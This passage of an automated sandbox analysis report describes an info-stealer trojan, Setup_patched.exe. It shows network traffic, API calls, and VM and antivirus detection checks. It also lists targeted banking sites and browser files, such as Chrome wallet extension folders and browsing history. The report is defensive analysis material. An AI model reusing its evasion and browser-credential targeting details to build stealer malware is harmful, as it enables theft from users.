            Source: Setup_patched.exe, 00000003.00000003.1508054493.000000000387E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: Setup_patched.exe, 00000003.00000003.1508054493.000000000387E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: Setup_patched.exe, 00000003.00000003.1508054493.000000000387E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
            Source: Setup_patched.exe, 00000003.00000003.1508054493.000000000387E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
            Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
            Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49692 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49694 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49697 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49698 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49699 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49701 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49702 version: TLS 1.2
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029CEBC0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,3_3_029CEBC0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029CEBC0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,3_3_029CEBC0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_02270B72 NtGetContextThread,NtSetContextThread,NtResumeThread,3_3_02270B72
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_022710E8 NtTerminateThread,3_3_022710E8
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_0227066E NtProtectVirtualMemory,3_3_0227066E
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_02270CD8 NtAllocateVirtualMemory,NtFreeVirtualMemory,3_3_02270CD8
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_2_0221206F NtAllocateVirtualMemory,3_2_0221206F
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_2_022120C2 NtFreeVirtualMemory,3_2_022120C2
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_2_02212100 NtProtectVirtualMemory,3_2_02212100
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029BFAE03_3_029BFAE0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_0299DBF03_3_0299DBF0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_02993B053_3_02993B05
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029A90803_3_029A9080
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029B98403_3_029B9840
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029B88703_3_029B8870
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029D46803_3_029D4680
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029A1EB63_3_029A1EB6
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029ADEA53_3_029ADEA5
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029A5E003_3_029A5E00
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029A37B33_3_029A37B3
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_0299B7203_3_0299B720
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029A17483_3_029A1748
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029DEF703_3_029DEF70
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029DFCB03_3_029DFCB0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029A1C1A3_3_029A1C1A
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029D84303_3_029D8430
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029B05B03_3_029B05B0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029A4D443_3_029A4D44
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029B62A03_3_029B62A0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_0299CAC03_3_0299CAC0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_0299FA003_3_0299FA00
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029B92303_3_029B9230
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029A5A293_3_029A5A29
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029B4A283_3_029B4A28
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029DD2503_3_029DD250
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029A1A7C3_3_029A1A7C
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029D9BD03_3_029D9BD0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_0299C3E03_3_0299C3E0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029BEBE03_3_029BEBE0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_0299B3003_3_0299B300
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029B7B203_3_029B7B20
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029D3B503_3_029D3B50
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029A0B403_3_029A0B40
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029A236D3_3_029A236D
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_02998B603_3_02998B60
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029C53603_3_029C5360
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029AB0943_3_029AB094
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029BF0803_3_029BF080
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029B38CD3_3_029B38CD
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_0299A8C03_3_0299A8C0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029990E03_3_029990E0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029DC8E03_3_029DC8E0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_0299C0103_3_0299C010
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029DA8103_3_029DA810
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029DF8503_3_029DF850
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029979D03_3_029979D0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029C39C03_3_029C39C0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029D59103_3_029D5910
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029DE9203_3_029DE920
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029931503_3_02993150
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029B51703_3_029B5170
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029B29693_3_029B2969
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029AD16C3_3_029AD16C
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029AA6B23_3_029AA6B2
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029AFEA63_3_029AFEA6
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_02999EC03_3_02999EC0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029986F03_3_029986F0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029DC6203_3_029DC620
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_02991FA03_3_02991FA0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029B57CD3_3_029B57CD
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029C87E03_3_029C87E0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029B2F083_3_029B2F08
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029A2F003_3_029A2F00
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029A9F053_3_029A9F05
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029A3F4E3_3_029A3F4E
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029B3C803_3_029B3C80
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029DF4A03_3_029DF4A0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029B5CD03_3_029B5CD0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029DCCD03_3_029DCCD0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029D94F03_3_029D94F0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029ABCE03_3_029ABCE0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029AF5993_3_029AF599
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029CC5A03_3_029CC5A0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_0299BDE03_3_0299BDE0
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029A55003_3_029A5500
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_2_022106653_2_02210665
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: String function: 0299B190 appears 52 times
            Source: Setup_patched.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: Setup_patched.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
            Source: Setup_patched.exe, 00000003.00000000.1280871188.0000000000522000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Setup_patched.exe
            Source: Setup_patched.exe, 00000003.00000003.1435938735.0000000002C1A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Setup_patched.exe
            Source: Setup_patched.exeBinary or memory string: OriginalFilenameshfolder.dll~/ vs Setup_patched.exe
            Source: Setup_patched.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@2/2
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_2_02210D75 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,CloseHandle,3_2_02210D75
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029D4680 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,GetVolumeInformationW,3_3_029D4680
            Source: C:\Users\user\Desktop\Setup_patched.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Setup_patched.exe, 00000003.00000003.1457810120.0000000003655000.00000004.00000800.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1487093001.0000000003560000.00000004.00000800.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1459975662.0000000003555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Setup_patched.exeVirustotal: Detection: 6%
            Source: Setup_patched.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
            Source: Setup_patched.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
            Source: Setup_patched.exeString found in binary or memory: /LoadInf=
            Source: Setup_patched.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
            Source: C:\Users\user\Desktop\Setup_patched.exeFile read: C:\Users\user\Desktop\Setup_patched.exeJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: Setup_patched.exeStatic file information: File size 1475072 > 1048576
            Source: Setup_patched.exeStatic PE information: real checksum: 0x199a246 should be: 0x16a7eb
            Source: C:\Users\user\Desktop\Setup_patched.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Setup_patched.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Setup_patched.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exe TID: 8128Thread sleep time: -210000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
            Source: Setup_patched.exe, 00000003.00000003.1488329379.0000000003563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: Setup_patched.exe, 00000003.00000003.1571959510.00000000006C2000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1624449226.00000000006C6000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1586172059.00000000006C6000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1452226921.00000000006BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: Setup_patched.exe, 00000003.00000003.1624449226.0000000000689000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: Setup_patched.exe, 00000003.00000003.1488959092.000000000367F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Users\user\Desktop\Setup_patched.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_3_029DB240 LdrInitializeThunk,3_3_029DB240
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_2_02210665 mov edx, dword ptr fs:[00000030h]3_2_02210665
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_2_02210C25 mov eax, dword ptr fs:[00000030h]3_2_02210C25
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_2_02211275 mov eax, dword ptr fs:[00000030h]3_2_02211275
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_2_02211274 mov eax, dword ptr fs:[00000030h]3_2_02211274
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_2_02210FD5 mov eax, dword ptr fs:[00000030h]3_2_02210FD5
            Source: C:\Users\user\Desktop\Setup_patched.exeCode function: 3_2_02211C63 mov eax, dword ptr fs:[00000030h]3_2_02211C63
            Source: C:\Users\user\Desktop\Setup_patched.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Setup_patched.exe, 00000003.00000003.1593315122.0000000000722000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1586531522.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1586096452.0000000000749000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000002.1626904861.0000000000718000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1624449226.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, Setup_patched.exe, 00000003.00000003.1586172059.00000000006B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\Setup_patched.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000003.00000003.1625889777.0000000002891000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1586693990.0000000003656000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Setup_patched.exe PID: 7836, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\Setup_patched.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
